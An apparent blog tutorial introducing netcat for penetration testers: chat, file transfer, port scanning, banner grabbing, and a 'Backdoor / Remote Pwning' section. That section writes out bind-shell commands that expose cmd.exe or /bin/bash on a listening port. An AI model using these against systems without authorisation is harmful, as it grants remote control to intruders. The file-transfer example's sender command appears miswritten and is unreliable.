Hacker's Swiss Army Knife - Netcat for Penetration testers from Scanning to Hacking

World of HackerWorld of Hacker
4 min read

This Thread will Discuss the Following things :-

  1. What is Netcat?
  2. Its Features.
  3. Installation Method
  4. Window's Box.
  5. Linux Box.
  6. Netcat One-Man Army.
  7. Multiple Tool / Use Name.
  8. Netcat as Chat Server.
  9. Netcat as File Transfering Application.
  10. Netcat as Port Scanning Tool.
  11. Netcat as Banner Grabbing Machine.
  12. Netcat as Backdoor / Remote Pwning - Granting Access to Create, Edit, Delete, and Break.
  13. Netcat as System-in-Law Conclusion.

Hacker's Swiss Army Knife - Netcat for Penetration testers from Scanning to Hacking

What is Netcat?

Netcat is a tool, which can read and write data across any TCP and UDP Network connections, Now, when it has a read and write mechanism for any TCP and UDP network connections, we can definitely juice out much stuff...

So, Let's See What its Features are:-

Some of Netcat’s features are:

  • Outbound or inbound connections, TCP or UDP, to or from any ports.
  • Full DNS forward/reverse checking, with appropriate warnings.
  • Ability to use any local source port.
  • Ability to use any locally-configured network source address.
  • Built-in port-scanning capabilities, with randomizer.
  • Built-in loose source-routing capability.
  • Can read command line arguments from standard input.
  • Slow-send mode, one line every N seconds.
  • Hex dump of transmitted and received data.
  • Optional ability to let another program service establish connections.
  • Optional telnet-options responder.
  • this list was listed on the vulnwatch.org website which no more exists.

So, After Getting to know all these features, you may want to give them a try, so how to get them and Install them.

Installation Method's

Google Search Results for Download Netcat, After you have downloaded them, How you can Run them:-

For Windows:-

  • Unzip and Run your netcat.exe or nc.exe file, that's it,

For Linux:-

  • Unzip and Go to Netcat Directory.
root@worldofhacker# make 
root@worldofhacker# make install
or
root@worldofhacker# apt-get install nc*
or
root@worldofhacker# yum install nc*

That's it, Now I assume you have running Netcat with you, so I will take you to Netcat Discovery Channel.

Netcat is one Alone Tool, that can do multiple Work, and all that work is not limited to are.

Netcat One-Man Army

  1. Netcat as Chat Server.
  2. Netcat as File Transfering Application.
  3. Netcat as Port Scanning Tool.
  4. Netcat as Banner Grabbing Machine.
  5. Netcat as Backdoor/Remote Pwning - Granting Access to Create, Edit, Delete and S*.

So, Let's Discuss all those Features.

  1. Netcat as Chat Server

System A:-

c:\> nc.exe -lvp 1234
or
krokite@worldofhacker~$ nc -lvp 1234    // This is for Linux system

System B:-

c:\> nc [system_A_ip] -vp 1234
or
krokite@worldofhacker~$ nc [system_A_ip] -vp 1234  // This is for Linux system
  1. Netcat as File Transfering Application.

System A [Receiving the File]

c:\> nc.exe -l -p 1234 > worldofhacker.txt 
or
krokite@worldofhacker~$ nc -l -p 1234 > worldofhacker.txt

System B [Sending the File]

c:\>nc.exe [system_A_ip] -p 1234 > krokite.txt
or
krokite@worldofhacker~$ nc [system_A_ip] -p 1234 > krokite.txt
  1. Netcat as Port Scanning Tool.
c:\> nc.exe -w2 -v -z [target_system_ip] 1-443
or 
krokite@worldofhacker~$ nc -w2 -v -z [target_system_ip] 1-443
or 
c:\> nc.exe -w2 -v -z [target_system_ip] 80,21,20,53,22,,25,110,143,443
or
krokite@worldofhacker~$ nc -w2 -v -z [target_system_ip] 80,21,20,53,22,25,110,143,443
  • w means to wait.
  • v means verbose mode, which means displaying the way program is processing.
  • z is used for scanning purposes [Zero-I/O]
  • 1-443 is port from 1 to 443, you can also specify 80,81,82,21,22,20,53, etc.
  1. Netcat as Banner Grabbing Machine.
c:\> nc.exe -vvn [target_ip] [port_number]

krokite@worldofhacker~$ nc -vvn [target_ip] [port_number]

c:\> nc.exe -vvn 1.1.1.1 80
GET /HTTP 1.0/krokite@worldofhacker~$ nc -vvn 1.1.1.1 80
GET /HTTP 1.0/

Press 2 times enter after you send GET Request.

For port 80 i.e, HTTP Request, you need to send a method of Request like [GET, PUT, HEAD, etc.,]

you may change port 80 to 21 or any other than you don't have to type GET request.

if you want to use a domain name instead of IP then remove n from -vvn, just use as -vv

  1. Netcat as Backdoor/Remote Pwning

System A

c:\> nc.exe -lp 1234 -e cmd.exe
or
krokite@worldofhacker~$ nc -lp 1234 -e /bin/bash

System B

c:\> nc.exe [system_A_ip] 1234
or
krokite@worldofhacker~$ nc [system_A_ip] 1234

System in Law - Conclusion

Hacking is Illegal, But Penetration testing with complete authority is legal. Do not use the Given knowledge to attack or Harm any person, if you do so, I [KroKite] or Worldofhacker.com will not be responsible for what you do with this knowledge.

That's it. Good Luck

Search more, explore more. Here are a few google outputs from my side:- Resource Center Google Search Results for Download Netcat Google Search Results for Netcat Swiff army knife

If you find some replies here with the link, will add them to the resource centre here:-

Any Questions Put them Below.

0
Subscribe to my newsletter

Read articles from World of Hacker directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

World of Hacker
World of Hacker

Engineer, Developer, Information Security Researcher, Code Digging, Software Exploitation, Web App Penetration testing, and Reverse Engineering, Browser Tech, Scraping, Automation, Hacking